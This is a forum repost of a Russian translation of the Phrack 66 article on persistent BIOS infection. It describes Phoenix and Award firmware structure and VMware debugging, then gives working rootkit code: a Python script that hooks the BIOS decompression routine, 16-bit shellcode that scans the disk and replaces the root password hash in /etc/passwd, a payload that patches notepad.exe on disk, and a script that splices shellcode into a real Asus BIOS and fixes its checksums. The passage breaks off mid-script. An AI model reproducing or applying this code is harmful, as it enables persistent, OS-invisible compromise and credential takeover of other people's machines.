• XSS.stack #1 – первый литературный журнал от юзеров форума

(Phrack 66): Persistent BIOS Infection (Устойчивый

Delivery Man

floppy-диск
Пользователь
Регистрация
09.10.2010
Сообщения
2
Реакции
0
Авторы: aLS и Alfredo
Переводчик: Ex0rcist a.k.a. Heroin
Оригинал (EN): www.phrack.org
Источник (RU): www.reverse4you.org
Persistent BIOS Infection

------[ 0.- Предисловие

Уважаемые пользователи, если вы читаете эту статью, мы можем предположить, что вы уже знаете, что такое BIOS и как он работает. Или, по крайней мере, вы имеете общtе представление о том, что делает BIOS, и его значение для нормальной работы компьютера. Основываясь на этом, мы кратко объясним некоторые основные понятия, чтобы ввести в курс дела, а затем мы будем переходить к более актуальным техническим тонкостям.

------[ 1.- Введение

На протяжении многих лет многое было сказано по этой теме. Но кроме старого вируса Chernobyl, который просто обнулял BIOS, если твоя материнская плата была одной из поддерживаемых, или для некоторых изменений для моддинга, такими как работа Pinczakko, мы не в состоянии найти общедоступные разработки, характерные для определенного класса вредоносных BIOS инфекций. Люди, как правило, думают, что эта тема раскурена вдоль и поперек, стара и имеются готовые разработки. Иногда даже путают с MBR вирусами. Мы намерены показать, что такой тип атаки возможен и может быть очень надежным и стойким руткитом, находясь в прошивке BIOS и оставаясь невидимой для ОС инфекцией.

В этой статье мы покажем универсальный метод, чтобы внедрить код в BIOS прошивки. Этот метод позволит нам встроить наш собственный код в BIOS прошивки так, что он будет выполнен непосредственно перед загрузкой операционной системы.

Мы также продемонстрируем, как с контролем жесткого диска или просто путем изменения конфиденциальных данных ОС в Linux box, развертывать полностью функциональный код непосредственно в процесс Windows.


---[ 1.1 - Назначение статьи

Основной идеей данной работы является показать то, как BIOS прошивки можно модифицировать и использовать как метод сохранения контроля после успешного рутанья. Ну, начнем потихонечку и постепенно будем рассматривать возникающие вопросы, разделив статью в двух основных направлениях:

- Модификации VMWare's (Phoenix) BIOS

- Рельные модификации BIOS

В каждом разделе мы расскажем основные моменты, чтобы показать, как провести атаку, а затем перейдем непосредственно к рассмотрению кода.


------[ 2.- Основы BIOS

---[2.1 - Введение в BIOS

Из википедии:
BIOS - загрузочная прошивка, запускаящаяся и исполняющая код самой первой после включения ПК. Начальной функцией BIOS является запуск тестирования и инициализация системных устройств, таких как видеокарта, жесткий диск, флоппи и проч. Это делается для подготовки машины к запуску с заданными параметрами так, чтобы загружалось и выполнялось установленное на носителях программное обечпечение, и передача управления ПК. Этот процесс известен как загрузка, за которой следует короткая преднастройка.

...создать небольшую библиотеку базовой системы ввода / вывода функций, которая может быть вызвана при эксплуатации и управлении периферийными устройствами, такими как клавиатура, функциями отображения текста и так далее. В IBM PC и в некоторых периферийных устройствах, таких как жесткий диск и контроллеры видеоадаптеров, имеется их собственный BIOS Extension ROM, который, предоставляет дополнительные функции. Операционные системы и исполнительняемое программное обеспечение, предназначенное для замены этих базовых функций прошивки, обеспечивает замену интерфейса программного обеспечения для приложений.


---[2.1.1 - Железо

Еще в 80-х BIOS прошивки загружались в ПЗУ или ППЗУ чипы, которые не могли быть изменены, но в настоящее время эта прошивка хранится в EEPROM (электрически стираемая программируемая Read-Only память). Этот вид памяти разрешает пользователю перепрошивать его, позволяя поставщику создавать обновления встроенного программного обеспечения для того чтобы исправить ошибки, добавить поддержку нового железа и функциональности.

---[2.1.2 - Как это работает?

BIOS имеет очень важное значение в работе компьютера. Он должен быть всегда доступен, как первая инструкция, выполняемая центральным процессором, при его включении. Вот почему он хранится в ROM.

Первый модуль BIOS называется загрузочный блок (Bootblock) и отвечает за POST (Power-On Self-Test) и аварийную загрузочную процедуру. POST является общим термином предварительной загрузки для компьютера, маршрутизатора или принтера. Он должен протестировать и инициализировать почти все аппаратные компоненты в системе, чтобы убедиться, что все работает правильно.

Современный BIOS имеет модульную структуру, что означает, что есть несколько модулей, интегрированных в одну прошивку, каждый из которых отвечает за конкретные задачи, от аппаратной инициализации до безопасности.

Каждый модуль является сжатым, поэтому есть точный алгоритм декомпрессии, отвечающий за декомпрессию и проверку других модулей, которые впоследствии будут выполняться.

После декомпрессии, определяются другие аппаратные средства, такие как PCI ROM (если необходимо), и в конце концов, в поисках загрузчика, читается 0 сектор жесткого диска (MBR), чтобы начать загрузку операционной системы.


---[2.2 - Файловая структура прошивки

Как мы упоминали ранее, прошивка BIOS имеет модульную структуру. При хранении в нормальном файле, он состоит из нескольких LZH сжатых модулей, каждый из которых содержит 8 бит контрольной суммы. Однако, не все модули являются сжатыми. Несколько модулей, такие как загрузочный блок (Bootblock) и алгоритм декомпрессии, явно не сжаты, потому что они являются фундаментальной частью процесса загрузки и должны выполнять декомпрессию других модулей. Далее мы увидим, почему для нас это так удобно.

Мы имеем выход Phnxdeco (доступны в Debian репозитории), открытый исходный код для разбора и анализа прошивки Phoenix BIOS ROM (то, что собираемся извлечь в 3.1.1):

Код:
+-------------------------------------------------------------------------+
| Class.Instance (Name)     Packed --->  Expanded      Compression  Offse |
+-------------------------------------------------------------------------+

B.03 (    BIOSCODE)   06DAF (28079) => 093F0 ( 37872)  LZINT ( 74%)  446DFh
B.02 (    BIOSCODE)   05B87 (23431) => 087A4 ( 34724)  LZINT ( 67%)  4B4A9h
B.01 (    BIOSCODE)   05A36 (23094) => 080E0 ( 32992)  LZINT ( 69%)  5104Bh
C.00 (      UPDATE)   03010 (12304) => 03010 ( 12304)   NONE (100%)  5CFDFh
X.01 (     ROMEXEC)   01110 (04368) => 01110 (  4368)   NONE (100%)  6000Ah
T.00 (    TEMPLATE)   02476 (09334) => 055E0 ( 21984)  LZINT ( 42%)  63D78h
S.00 (     STRINGS)   020AC (08364) => 047EA ( 18410)  LZINT ( 45%)  66209h
E.00 (       SETUP)   03AE6 (15078) => 09058 ( 36952)  LZINT ( 40%)  682D0h
M.00 (       MISER)   03095 (12437) => 046D0 ( 18128)  LZINT ( 68%)  6BDD1h
L.01 (        LOGO)   01A23 (06691) => 246B2 (149170)  LZINT (  4%)  6EE81h
L.00 (        LOGO)   00500 (01280) => 03752 ( 14162)  LZINT (  9%)  708BFh
X.00 (     ROMEXEC)   06A6C (27244) => 06A6C ( 27244)   NONE (100%)  70DDAh
B.00 (    BIOSCODE)   001DD (00477) => 0D740 ( 55104)  LZINT (  0%)  77862h
*.00 (      TCPA_*)   00004 (00004) => 00004 (   004)   NONE (100%)  77A5Ah
D.00 (     DISPLAY)   00AF1 (02801) => 00FE0 (  4064)  LZINT ( 68%)  77A79h
G.00 (  DECOMPCODE)   006D6 (01750) => 006D6 (  1750)   NONE (100%)  78585h
A.01 (        ACPI)   0005B (00091) => 00074 (   116)  LZINT ( 78%)  78C76h
A.00 (        ACPI)   012FE (04862) => 0437C ( 17276)  LZINT ( 28%)  78CECh
B.00 (    BIOSCODE)   00BD0 (03024) => 00BD0 (  3024)   NONE (100%)  7D6AAh

Мы видим здесь различные части файла прошивки, содержащие DECOMPCODE раздел, где расположен алгоритм декомпрессии, а также другие, не рассматриваемые в этой статье параметры.


---[2.3 - Обновление

Программное обеспечение BIOS не так уж сильно отличается от любого другого программного обеспечения. Это относится к ошибкам, которые можно встретить и в другом программном обеспечении. С новыми версиями выходит поддержка нового железа, дополнения, исправление ошибок и т. д. Но процесс обновления может быть очень опасным на реальной машине. BIOS является одним из основных компонентов компьютера. Это первая часть кода, выполняемая при включении машины. Именно поэтому мы должны быть очень осторожны, когда делаем такого рода вещи. Неудачное обновление BIOS может привести к зависанию машины. И ты соснешь тунца.

Вот почему так важно иметь такую платформу для тестирования как VMWare. По крайней мере на первое время, потому что, как мы увидим далее, есть много различий между VMware и реальным железом.


------[ 3 .- Заражение BIOS

--- [3.0 - Первичная настройка

--- [3.1 - Модификация VMware (Phoenix) BIOS

Во-первых, мы должны получить действительную прошивку VMWARE BIOS для работы. Для того чтобы читать EEPROM (где хранится прошивка BIOS) нам необходимо запустить код в режиме отладки ядра, чтобы отправлять и получать данные непосредственно в южный мост через порты ввода-вывода. Для этого нам также необходимо знать некоторые конкретные данные о текущем оборудовании. Эти данные обычно предоставляются производителем. Более того, почти все поставщики плат предоставляют некоторые инструменты для обновления BIOS, и очень часто они имеют возможность резервного копирования существующей прошивки.

В VMWare мы не можем использовать эти инструменты, потому что эмулируемое железо не имеет ту же функциональность, как реальное оборудование. В этом есть смысл... Почему бы не обновить VMWare BIOS изнутри...?

---[3.1.1 - Дамп VMWare BIOS

Для начала было бы неплохо иметь встроенный GDB сервер, который предлагает VMWare. Он позволяет нам производить отладку и понимать, что происходит. Таким образом, в целях исправления и изменения некоторых маленьких кусков кода, чтобы начать тестирование, мы использовали некоторые случайные массивы байтов в качестве шаблонов для поиска BIOS в памяти.П роделывая это, мы обнаружили, что в VMware-VMX существует основная исполняемая VMware секция, весом почти 256кб, которая называется .bios440 (которая в нашей версии VMware находится между смещением в файле 0x6276c7-0x65B994). Она содержит всю прошивку BIOS, точно так же, как и в обычном файле, готовом к выполнению.Вы можете использовать objdump для того чтобы видеть разделы файла:

Код:
objdump -h vmware-vmx

И вы можете сдампить его, используя инструмент objcopу:

Код:
objcopy -j .bios440 -O binary --set-section-flags .bios440=a \ 
vmware-vmx bios440.rom.zl

Ммм... Это означает, что... если у нас есть привилегии на машине жертвы, мы можем изменить исполняемый VMware-VMX, вставляя наш собственный инфицированный BIOS, и он будет выполняться каждый раз, когда загружается VMware. Для каждого из VMware на компьютер. Sweet!

Но Существуют более простые способы решения этой задачи. Мы собираемся изменить его несколько раз, и он не будет работать все время... Чем проще, тем лучше.


---[3.1.2 - Настройка VMWARE для загрузки альтернативного BIOS

Мы поняли, что VMWare предлагает очень практичный путь, чтобы пользователь мог использовать конкретный файл прошивки BIOS прямо через файл конфигурации .VMX. Существует не очень известный тег, который называется "bios440.filename" и он позволяет избегать использование встроенного в VMWare BIOS и вместо этого позволяет нам указать BIOS файл, который нужно использовать. Добавь в файл .VMX следующий код:

Код:
bios440.filename = "path/to/file/bios.rom"

На нах! Теперь у нас есть другая прошивка BIOS, которая работает в нашей VM, и в сочетании с:

Код:
debugStub.listen.guest32 = "TRUE" or
debugStub.listen.guest64 = "TRUE"

ставит GDB заглушки на VMWare и ждет вашего соединения на локальный порт 8832. И мы в конечном итоге с остаемся с отличной и полностью поддающейся отладке исследовательской платформой. Нравится? Другими важными скрытыми тегами, которые могут быть полезны, являются:

Код:
        bios.bootDelay = "3000"                  # Для задержки загрузки X
                                                   миллисекундах
        debugStub.SPOILERBreakpoints = "TRUE"       # Позволяет GDB
                                                   работать с остановками
        debugStub.listen.guest32.remote = "TRUE" # Для отладки с 
                                                   другой машины (32bit)
        debugStub.listen.guest64.remote = "TRUE" # Для отладки с 
                                                   другой машины (64bit)
        monitor.debugOnStartGuest32 = "TRUE"     # Позволяет остановить VM
                                                   на первой инструкции
                                                   по адресу 0xFFFF0


---[3.1.3 - Распаковка прошивки

Как мы уже говорили, некоторые из модулей сжаты LZH. Есть несколько доступных средств для извлечения и распаковки каждого отдельного модуля файла прошивки. Наиболее часто используемыми являются Phnxdeco и Awardeco (два отличных Linux GPL инструмента) совместно с Phoenix BIOS Editor и Award BIOS Editor (не GPL инструменты для Windows).
Если хочешь, можешь использовать Phoenix BIOS Editor в Linux с помощью wine. Он будет извлекать все модули в каталог/временный каталог внутри Phoenix BIOS Editor, которые готовы к открытию привычным тебе дизассемблером. Хорошей возможностью Phoenix BIOS Editor является то, что он также может восстанавливать основной файл прошивки. Он может сжимать и встраивать различные распакованные модули, чтобы прошивка была в неизменном виде. Учти, что эта функция была сделана для последних версий Phoenix BIOS и он пропускает проверку контрольной суммы, поэтому нам придется делать это вручную (мы увидим это в 3.2.2.1)

Некоторые из этих задач выполняются отдельными инструментами, которые могут быть вызваны непосредственно из командной строки, что является очень удобным, для того чтобы автоматизировать процесс для исследования простых скриптов.

---[3.1.4 - Модификации

Итак, вот мы и приблизились к самому интересному. У нас есть все распакованные модули, и возможность их изменения, а затем и восстановления в полностью рабочий BIOS Flash Update. Первая фраза, которая приходит на ум это, "где патчить?". Мы можем поставить "ловушку" на выполнение нашего кода почти в любом месте. Но мы должны все продумать, прежде чем решить о том, в каком месте патчить.
В начале мы думали о подключении к первой инструкции, которую выполняет процессор, а именно 0xF000: FFF0. Это казалось самым лучшим вариантом, потому что эта команда всегда в точном месте, и ее легко найти. Но мы должны принимать во внимание сам процесс выполнения. Чтобы наш код работал, все распознавание оборудования должно производится нами (DRAM, северный мост, кэш, PCI и т.д.)

Например, если мы хотим иметь доступ к жестким дискам, мы должны быть уверены, что, при выполнении нашего кода, мы уже имеем доступ к жесткому диску. По этой причине мы выбрали для подключения алгоритм декомпрессии. Также это удобно потому, что он не меняется от версии к версии. Кроме того, его очень легко найти путем поиска по шаблону. Он не сжат и вызывается много раз в течение последовательной загрузки BIOS, что дает нам возможность проверить, все ли необходимые службы доступны и приступить к реальным вещам. Далее мы имеем дамп скрипта для быстрого извлечения прошивки модулей, сбора данных, их внедрения, и компиляции измененного файла прошивки. PREPARE.EXE и CATENATE.EXE являются собственными инструменты создания прошивки Phoenix, которые можно найти в Phoenix BIOS Editor, а также в комплекте с другими инструментами. В более поздних версиях скрипта эти инструменты не нужны (как показано в 3.2.2.1).

Код:
#!/usr/bin/python import os,struct

#--------------------------- Decomp processing ------------------------------
#assemble the whole code to inject
os.system('nasm ./decomphook.asm')
decomphook = open('decomphook','rb').read()
print "Leido hook: %d bytes" % len(decomphook)
minihook = '\x9a\x40\x04\x3b\x66\x90' # call near +0x430

#Load the decompression rom
decorom = open('DECOMPC0.ROM.orig','rb').read()

#Add the hook
hookoffset=0x23
decorom = decorom[:hookoffset]+minihook+decorom[len(minihook)+hookoffset:]

#Add the shellcode
decorom+="\x90"*100+decomphook
decorom=decorom+'\x90'*10

#recalculate the ROM size
decorom=decorom[:0xf]+struct.pack("<H",len(decorom)-0x1A)+decorom[0x11:]

#Save the patched decompression rom
out=open('DECOMPC0.ROM','wb')
out.write(decorom)
out.close()

#Compile 
print "Prepare..."
os.system('./PREPARE.EXE ./ROM.SCR.ORIG')
print "Catenate..."
os.system('./CATENATE.EXE ./ROM.SCR.ORIG')
os.system('rm *.MOD')

---[3.1.5 - Подгрузка

Прежде чем говорить о подгрузке, мы должны решить, "где" мы будем хранить нашу подгрузку, и это не тривиальная задача. Мы обнаружили, что существует много заполняемого пространства в конце алгоритма декомпрессии, которое при выделении будет использоваться как буфер для хранения распакованного кода. Таким образом, мы будем внедрять любой код, который нам нужен. Это немного усложняет подгрузку, потому что при этом требуется разбить шеллкод на два участка. Первый выполняется при внедрении в начале алгоритма декомпрессии. Простой вызов, который перенаправляет исполняемый поток на наш код и далее ко второму безопасному этапу, который, как мы знаем, остается неиспользованным в течение всего процесса подгрузки. Затем, обновляя код, указывает новый адрес и выполняет исходные инструкции.
e74fd96a9ef1.jpg

Давай посмотрим код:

Код:
|-----------------------------------------------------------|

BITS 16

;Extent to search (in 64K sectors, aprox 32 MB)
%define EXTENT 10 

start_mover:

  ;save regs
  ;jmp start_mover
    pusha
    pushf

  ; set dst params to move the shellcode
    xor ax, ax
    xor di, di
    xor si, si
    push cs
    pop ds
    mov es, ax; seg_dst
    mov di, 0x8000; off_dst
    mov cx, 0xff; code_size

  ; get_eip to have the 'source' address
    call b
b:
    pop si
    add si, 0x25  (Offset needed to reach the second stage payload)
    rep movsw

    mov ax, word [esp+0x12]; get the caller address to patch the original hook
    sub ax, 4
    mov word [eax], 0x8000; new_hook offset
    mov word [eax+2], 0x0000; new_hook segment

  ; restore saved regs
    popf
    popa

  ; execute code smashed by 'call far'
  ;mov es,ax
    mov bx,es
    mov fs,bx
    mov ds,ax
    retf
  
  
  ;Here goes a large nopsled and next, the second stage payload
  
	|------------------------------------------------------------|

Bторой этап, в настоящее время находящийся в неиспользуемом пространстве, должен получить несколько готовых сигналов, чтобы знать, доступны ли сервисы, которые мы хотим использовать.


---[3.1.5.1 - Готовый сигнал

В VMWare мы видели, что когда наша подгрузка на второй стадии, и IVT уже инициализирован, у нас есть все, что нам нужно. Исходя из этого мы решили использовать IVT инициализацию, как сигнал готовности. Это очень просто, потому что всегда отображается на 0000:0000. Каждый раз, когда шеллкод запускается на выполнение, проверяем, инициализируется ли IVT с правильными указателями, выполняется ли шеллкод, если нет, то возвращается, ничего не делая.


---[3.1.5.1 - The Real stuff

Что же мы будем делать теперь, когда у нас есть исполняемый код, и мы знаем, что у нас есть все сервисы? Мы не можем взаимодействовать с ОС отсюда. В этот момент операционная система просто массив символов, находящийся на диске. Погоди! Мы же имеем доступ к диску через Int 13h (низкоуровневая служба). Мы можем изменить его в любое время, какое нам нужно! Оке, давай попробуем это проделать. При реальной реализации вредоносного кода тебе нужно накодить некий основной драйвер, чтобы корректно различать файловые системы, по крайней мере FAT и NTFS (возможно также использование GRUB или LILO). Для этой статьи, в доказательство концепции, мы будем использовать Int 13h для последовательного чтения диска в нестандартном режиме. Мы будем реализовывать все это дело через (_о_), но как мы говорили ранее, в общем случае, изменение, добавление и удаление любых файлов на диске позволет злоумышленнику изменять модули драйверов, заражать файлы, отключать антивирус или антируткиты и т.д.

Используем шеллкод, с помощью которого мы просмотрим весь диск в соответствии с маской: "root:$", чтобы найти запись /etc/passwd. Затем мы заменим root хэш нашим собственным хэшем, установив пароль "root" для суперпользователя.

Код:
-------------------------------------------------------------
; The shellcode doesn't have any type of optimization, we tried to keep it 
; simple, 'for educational purposes' 

; 16 bit shellcode
; use LBA disk access to change root password to 'root'

BITS 16	
	push es
	push ds
	pushad
	pushf

; Get code address
	call gca
gca:    pop bx

; construct DAP
	push cs
	pop ds
	mov si,bx
	add si,0x1e0; DAP 0x1e0 from code
	mov cx,bx
	add cx,0x200; Buffer pointer 0x200 from code
	mov byte [si],16;size of SAP
	inc si
	mov byte [si],0;reserved
	inc si
	mov byte [si],1;number of sectors
	inc si
	mov byte [si],0;unused
	inc si
	mov word [si],cx;buffer segment
	add si,2
	mov word [si],ds;buffer offset
	add si,2
	mov word [si],0; sector number
	add si,2
	mov word [si],0; sector number
	add si,2
	mov word [si],0; sector number
	add si,2
	mov word [si],0; sector number

	mov di,0
	mov si,0
mainloop:
	push di
	push si
          
;-------- Inc sector number
	mov cx,3
	mov si,bx
	add si,0x1e8
loopinc:
	mov ax,word [si]
	inc ax
	mov word [si],ax
	cmp ax,0
	jne incend
	add si,2
	loop loopinc
incend:
;-------- LBA extended read sector
	mov ah,0x42; call number
	mov dl,0x80; drive number 0x80=first hd
	mov si,bx
	add si,0x1e0
	int 0x13
	jc mainend
	nop
	nop
	nop

;-------- Search for 'root'
	mov di,bx
	add di,0x200; pointer to buffer
	mov cx,0x200; 512 bytes per sector
searchloop:
	cmp word [di],'ro'
	jne notfound
	cmp word [di+2],'ot'
	jne notfound
	cmp word [di+4],':$'
	jne notfound
	jmp found; root found!
notfound:
	inc di
	loop searchloop

endSearch:
	pop si
	pop di

	inc di
	cmp di,0
	jne mainloop
	inc si
	cmp si,3
	jne mainloop

mainend:
	popf
	popad
	pop ds
	pop es
	int 3
found:
;replace password with: 
;root:$2a$08$Grx5rDVeDJ9AXXlXOobffOkLOnFyRjk2N0/4S8Yup33sD43wSHFzi:
;Yes we could've used rep movsb, but we kinda suck.
	mov word[di+6],'2a'
	mov word[di+8],'$0'
	mov word[di+10],'8$'
	mov word[di+12],'Gr'
	mov word[di+14],'rD'
	mov word[di+16],'Ve'
	mov word[di+18],'DJ'
	mov word[di+20],'9A'
	mov word[di+22],'XX'
	mov word[di+24],'lX'
	mov word[di+26],'Oo'
	mov word[di+28],'bf'
	mov word[di+30],'fO'
	mov word[di+32],'kL'
	mov word[di+34],'On'
	mov word[di+36],'Fy'
	mov word[di+38],'Rj'
	mov word[di+40],'k2'
	mov word[di+42],'N0'
	mov word[di+44],'/4'
	mov word[di+46],'S8'
	mov word[di+48],'Yu'
	mov word[di+52],'p3'
	mov word[di+54],'3s'
	mov word[di+56],'D4'
	mov word[di+58],'3w'
	mov word[di+60],'SH'
	mov word[di+62],'Fz'
	mov word[di+64],'i:'
;-------- LBA extended write sector
	mov ah,0x43; call number
	mov al,0; no verify 
	mov dl,0x80; drive number 0x80=first hd
	mov si,bx
	add si,0x1e0
	int 0x13
	jmp mainend

Этот код также представляет собой подгрузку, но в этом случае мы ищем по всему диску, пытаясь сопоставить шаблон внутри notepad.exe, и затем вводим кусок кода с простым вызовом MessaBoxA и ExitProcess, для его красивого завершения.

Код:
  hook_start:
  	nop
  	nop
  	nop
  	nop
  	nop
  	nop
  	nop
  	nop
  	nop
  	nop
  	nop
  	nop
  	nop
  	nop
  	nop
        ;jmp hook_start
        ;mov bx,es
        ;mov fs,bx
        ;mov ds,ax
        ;retf

          pusha
          pushf
          xor di,di
  	mov ds,di
  ; check to see if int 19 is initialized
  	cmp byte [0x19*4],0x00 
  	jne ifint

  noint:
        ;jmp noint; loop to debug
          popf
          popa
        ;mov es, ax
          mov bx, es
  	mov fs, bx
  	mov ds, ax
          retf


  ifint:
        ;jmp ifint; loop to debug
  	cmp byte [0x19*4],0x46
          je noint

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

  initShellcode:
    ;jmp initShellcode; DEBUG
      cli
      push es
      push ds
      pushad
      pushf

    ; Get code address
      call gca

  gca:
      pop bx
    ;---------- Set screen mode
      mov ax,0x0003
      int 0x10
    ;---------- construct DAP
      push cs
      pop ds
      mov si,bx
      add si,0x2e0; DAP 0x2e0 from code
      mov cx,bx
      add cx,0x300; Buffer pointer 0x300 from code
      mov byte [si],16;size of SAP
      inc si
      mov byte [si],0;reserved
      inc si
      mov byte [si],1;number of sectors
      inc si
      mov byte [si],0;unused
      inc si
      mov word [si],cx;buffer segment
      add si,2
      mov word [si],ds;buffer offset
      add si,2
      mov word [si],0; sector number
      add si,2
      mov word [si],0; sector number
      add si,2
      mov word [si],0; sector number
      add si,2
      mov word [si],0; sector number

      mov di,0
      mov si,0

    ;-------- Function 41h: Check Extensions
      push bx
      mov ah,0x41; call number
      mov bx,0x55aa;
      mov dl,0x80; drive number 0x80=first hd
      int 0x13
      pop bx
      jc mainend_near
    ;-------- Function 00h: Reset Disk System
      mov ah, 0x00
      int 0x13
      jc mainend_near
      jmp mainloop
  mainend_near:
      jmp mainend
  mainloop:
      cmp di,0
      jne nochar
    ;------- progress bar (ABCDE....)
      push bx
      mov ax,si
      mov ah,0x0e
      add al,0x41
      mov bx,0
      int 0x10
      pop bx
  nochar:
      push di
      push si
    ;jmp incend  ;
    ;-------- Inc sector number
      mov cx,3
      mov si,bx    ; bx = curr_pos 
      add si,0x2e8  ; +2e8 LBA Buffer

  loopinc:
      mov ax,word [si]
      inc ax
      mov word [si],ax
      cmp ax,0
      jne incend
      add si,2
      loop loopinc

  incend:
  LBA_read:
    ;jmp int_test
    ;-------- LBA extended read sector
      mov ah,0x42; call number
      mov dl,0x80; drive number 0x80=first hd
      mov si,bx
      add si,0x2e0
      int 0x13
      jnc int13_no_err
    ;-------- Write error character
      push bx
      mov ax,0x0e45
      mov bx,0x0000
      int 0x10
      pop bx
  int13_no_err:
    ;-------- Search for 'root'
      mov di,bx
      add di,0x300; pointer to buffer
      mov cx,0x200; 512 bytes per sector

  searchloop:
      cmp word [di],0x706a
      jne notfound
      cmp word [di+2],0x9868
      jne notfound
;debugme:
;    je debugme
      cmp word [di+4],0x0018
      jne notfound
      cmp word [di+6],0xe801  
      jne notfound
      jmp found; root found!


  notfound:
      inc di
      loop searchloop

  endSearch:
      pop si
      pop di

      inc di
      cmp di,0
      jne mainloop
      inc si
      cmp si,EXTENT;------------ 10x65535 sectors to read
      jne mainloop
      jmp mainend

  exit_error:  
      pop si
      pop di

  mainend:
      popf
      popad
      pop ds
      pop es
      sti

      popf
      popa
      mov bx, es
      mov fs, bx
      mov ds, ax
      retf

  writechar:
      push bx
      mov ah,0x0e
      mov bx,0x0000
      int 0x10
      pop bx
      ret
  found:
      mov al,0x46
      call writechar

    ;mov word[di], 0xfeeb; Infinite loop - Debug
      mov word[di], 0x00be
      mov word[di+2], 0x0100
      mov word[di+4], 0xc700
      mov word[di+6], 0x5006
      mov word[di+8], 0x4e57
      mov word[di+10], 0xc744
      mov word[di+12], 0x0446
      mov word[di+14], 0x2121
      mov word[di+16], 0x0100
      mov word[di+18], 0x016a
      mov word[di+20], 0x006a
      mov word[di+22], 0x6a56
      mov word[di+24], 0xbe00
      mov word[di+26], 0x050b
      mov word[di+28], 0x77d8
      mov word[di+30], 0xd6ff
      mov word[di+32], 0x00be
      mov word[di+34], 0x0000 
      mov word[di+36], 0x5600
      mov word[di+38], 0xa2be
      mov word[di+40], 0x81ca
      mov word[di+42], 0xff7c
      mov word[di+44], 0x90d6

;-------- LBA extended write sector
      mov ah,0x43; call number
      mov al,0; no verify 
      mov dl,0x80; drive number 0x80=first hd
      mov si,bx
      add si,0x2e0
      int 0x13
      jmp notfound; continue searching
      nop


---[3.2 - Реальные модификации BIOS

VMWare - отлично подходит для исследования BIOS и разработоки платформы. Но для завершения этого исследования, мы должны атаковать реальную систему. Для этого мы использовали обычную материнскую плату (Asus A7V8X-MX) очень популярной версией Award-Phoenix 6.00 PG BIOS.


---[3.2.1 - Дамп прошивки BIOS

Флэш-микросхемы отлично совместимы, и даже взаимозаменяемы. Но они подключаются к материнской плате по-разному (PCI, ISA bridge, и т.д.), что, в общем случае, делает чтение довольно сложной адачей. Как же мы сможем сделать руткит, если мы даже не можем найти способ надежно читать память? Конечно, одним из решений может являться Flash reader, но на данном этапе мы его не имеем, и это не вариант, если ты хочешь удаленно заразить BIOS без физического доступа. Поэтому мы начали искать программные альтернативы. Первый инструмент, который мы нашли, работал неплохо. Это утилита FlashROM от проекта coreboot с открытым исходным кодом, см. [COREBOOT] (также имеется в Debian репозиториях). Она содержит обширную базу данных чипов и обладает read/write методами. Мы обнаружили, что она почти всегда работает, даже если придется вручную указать модель IC, потому что утилита не всегда распознает их автоматически.

Код:
$ flashrom -r mybios.rom

Как правило, команда, указанная выше - это все, что вам нужно. BIOS должен быть в mybios.rom файле. Фишка в том, что если он говорит, что не может обнаружить чип, ты должны написать скрипт, чтобы попытаться заюзать все известные чипы. Нам еще предстоит найти BIOS'ы, которые не могут быть считаны с помощью этой методики. Запись немного сложнее, так как FlashROM'y необходимо правильно определить IC, что позволит ему запись. Это ограничение можно обойти путем изменения исходного кода. Но нужно учитывать, что в этом случае можно нахер спалить свою материнку.

Мы также использовали FlashROM в общем случае для загрузки измененного BIOS на материнскую плату.


---[3.2.2 - Модификация

После того как мы получили образ BIOS, мы можем начать процесс вставки вредоносного кода. При изменении реального BIOS'a, в частности Award / Phoenix BIOS'a, мы столкнулись с некоторыми большими проблемами:
1) отсутствие документации BIOS структуры
2) отсутствие инструментов упаковки / распаковки
3) отсутствие способа отладки оборудования.

Есть множество бесплатных инструментов для управления BIOS, но как всегда получается с собственными разработками форматов, мы не могли найти инструмент, который работал бы именно с нашей прошивкой. Мы можем использовать утилиты Linux awardeco и phnxdeco в качестве отправной точки, но они часто работают со сбоями на современных BIOS версиях.

Наш план для получения исполняемого кода таков:
1) мы должны сделать произвольные изменения (мы должны знать позиции контрольной суммы и алгоритмы)
2) основной код должен быть вставлен в общей, легкодоступной части BIOS.
3) после выполнения кода, может быть вставлен Shellcode.


---[3.2.2.0 - Black Screen of Death

Ты должен понимать, что сломаешь много BIOS чипов, проделывая эти трюки. Но большинство BIOS имеют механизм безопасности для восстановления поврежденной прошивки. RTFM (читаймануалы по
материнской плате).

Если это не поможет, ты можешь использовать чип для "горячей замены": ты грузишься с рабочего чипа, затем делаешь его "горячую замену" на поврежденный, и перепрошиваешь. Конечно, для этой техники у тебя должен быть резервный рабочий BIOS.


--- [3.2.2.1 - Изменение бита в единицу времени

Наши первые попытки были неудачными и почти всегда система не загружалась. В основном мы не обращали внимания, сколько контрольных сумм имеет BIOS, но ты должен будешь пропатчить каждую или лицезреть ошибку "BIOS CHECKSUM ERROR" на черном экране смерти. Черный экран смерти дает нам подсказку, он говорит: "контрольная сумма". Скорее всего он должен быть каким-то дополнением, сравневаемым с числом. И этот вид проверки можно легко обойти, внедряя значение в определенное место, которое будет являться "дополнением". Разве это не весомая причина для создания CRC? Оказывается, что все контрольные суммы были 8-битными, и, коснувшись только одного байта в конце шеллкода, все контрольные суммы были правильными. Можно написать очень простой алгоритм на вложения внутри этого Python скрипта:

Код:
-------------------------------------------------------------
	modifBios.py

	#!/usr/bin/python
	import os,sys,math

	# Usage
	if len(sys.argv)<3:
        	print "Modify and recalculate Award BIOS checksum"
         print "Usage: %s <original bios> <assembly shellcode 
  file>" % (sys.argv[0])
        	exit(0)

	# assembly the file
	scasm = sys.argv[2]
	sccom = "%s.bin" % scasm
	os.system("nasm %s -o %s " % (scasm,sccom) )
	shellcode = open(sccom,'rb').read()
	shellcode = shellcode[0xb55:] # skip the NOPs
	os.unlink(sccom)
	print ("Shellcode lenght: %d" % len(shellcode))

	# Make a copy of the original BIOS
	modifname = "%s.modif" % sys.argv[1]
	origname = sys.argv[1]
	os.system("cp %s %s" % (origname,modifname) )

	#merge shellcode with original flash
	insertposition = 0x3af75
	modif = open(modifname,'rb').read()
	os.unlink(modifname)
	newbios=modif[:insertposition]
	newbios+=shellcode
	newbios+=modif[insertposition+len(shellcode):]
	modif=newbios
	#insert hook
	hookposition = 0x3a41d
	hook="\xe9\x55\x0b" # here is our hook,
       # at the end of the bootblock
	newbios=modif[:hookposition]
	newbios+=hook
	newbios+=modif[hookposition+len(hook):]
	modif=newbios

	#read original flash
	orig  = open(sys.argv[1],'rb').read()
	
	# calculate original and modified checksum
	# Sorry, this script is not *that* generic
	# you will have to harvest these values
	# manually, but you can craft an automatic
	# one using pattern search. 
	# These offsets are for the Asus A7V8X-MX
	# Revision 1007-001
	
